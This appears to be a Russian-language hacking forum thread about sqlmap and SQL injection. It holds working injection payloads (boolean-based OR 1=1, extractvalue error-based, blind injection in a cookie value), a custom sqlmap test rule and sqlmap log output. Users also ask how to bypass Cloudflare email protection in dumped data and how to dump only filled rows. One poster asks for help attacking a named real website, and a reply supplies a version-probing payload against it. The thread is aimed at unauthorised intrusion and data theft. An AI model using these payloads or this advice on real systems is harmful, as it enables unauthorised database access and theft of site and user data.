Есть boolean based такого формата x.php?q=1' OR 1=1 OR 'bla'='bla Но мап ее не видит, подозреваю из-за OR OR Думаю, что надо подправить boolean_blind.xml, верно? кто может помочь правильно составить правило? upd изменил, теперь видит иньекцию, но говорит что false-positive, как это исправить? <test> <title>OR boolean-based blind - WHERE or HAVING clause</title> <stype>1</stype> <level>1</level> <risk>1</risk> <clause>1,9</clause> <where>2</where> <vector>OR [INFERENCE]</vector> <request> <payload>%27OR 1=1 OR %273%27=%273</payload> </request> <response> <comparison>%27OR 1=2 OR %273%27=%273</comparison> </response> </test> [03:55:45] [INFO] GET parameter 'q' appears to be 'OR boolean-based blind - WHER E or HAVING clause' injectable [03:55:51] [INFO] automatically extending ranges for UNION query injection techn ique tests as there is at least one other (potential) technique found [03:56:05] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retriev al [03:56:05] [INFO] checking if the injection point on GET parameter 'q' is a fals e positive [03:56:05] [WARNING] false positive or unexploitable injection point detected [03:56:05] [WARNING] GET parameter 'q' does not seem to be injectable
Как можно обойти Cloudflare email protection, когда вместо емейлов в дампе : /cdn-cgi/l/email-protection" class="cf_email" data- Нашел IP за Cloudflare, поставил его в hosts фаил в Windows. Но sqlmap/python это игнорит. Спасибо
Всем привет, кто может, помогите долбануть этот сайт: Code: http://wrappers.ru/?act=polls&poll=1%22%27
1- вы ошиблись разделом 2- там waf 3- не ясно что вы ходите. Задайте точный вопрос или опишите проблему. Code: http://wrappers.ru/?act=polls&poll=1"+and+substring(@@version,1,1)=5+--+-
Всем привет, такой вопрос - есть куча ссылок которые нужно пройти, отдаю их мапу и ухожу, как сделать чтобы уязвимые ссылки как-то помечались, потому что он в аутпут складывает все как я понимаю, без разбора, то есть все пройденные. Спасибо.
День добрый, господа. Есть такая скуль: Code: https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27,%20extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+- Где вроде как insert statement, потому что если после ' не добавить еще один параметр через запятую, то выдается такая ошибка: Code: Column count doesn't match value count at row 1 Подскажите, реально ли такое засунуть в мап и как это сделать?
привет. подскажите как мапу указать на то какие данные меняются? скуля слепая в куках уязвим параметр identifyId: amplitude_idundefined={"optOut":false,"sessionId":null,"lastEventTime":null,"eventId":0,"identifyId":027179381' or 3726=3726--,"sequenceNumber":0} я так понимаю нужно добавить --string="а вот что здесь хз"
Делайте через Code: https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27*extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+- https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27-extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+- https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27/extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+- и вариации
Ищи строку, которая всегда присутствует на неижектированной странице и неизменна(обязательно), но отсутствует при внедрении и false ответе Если добавляется какая-либо строка при false то использовать нужно --not-string="bsdhbhsb" , но при условии если она отсутствует при тру ответе По крайней мере так написано в манах
Такой вопрос. Есть колонка Type допустим, строк 100к+, практически везде колонка пустая, но в некоторых есть данные. Можно ли как то сдампить только те что содержат данные? Какие там данные я не знаю, так можно было бы --where указать
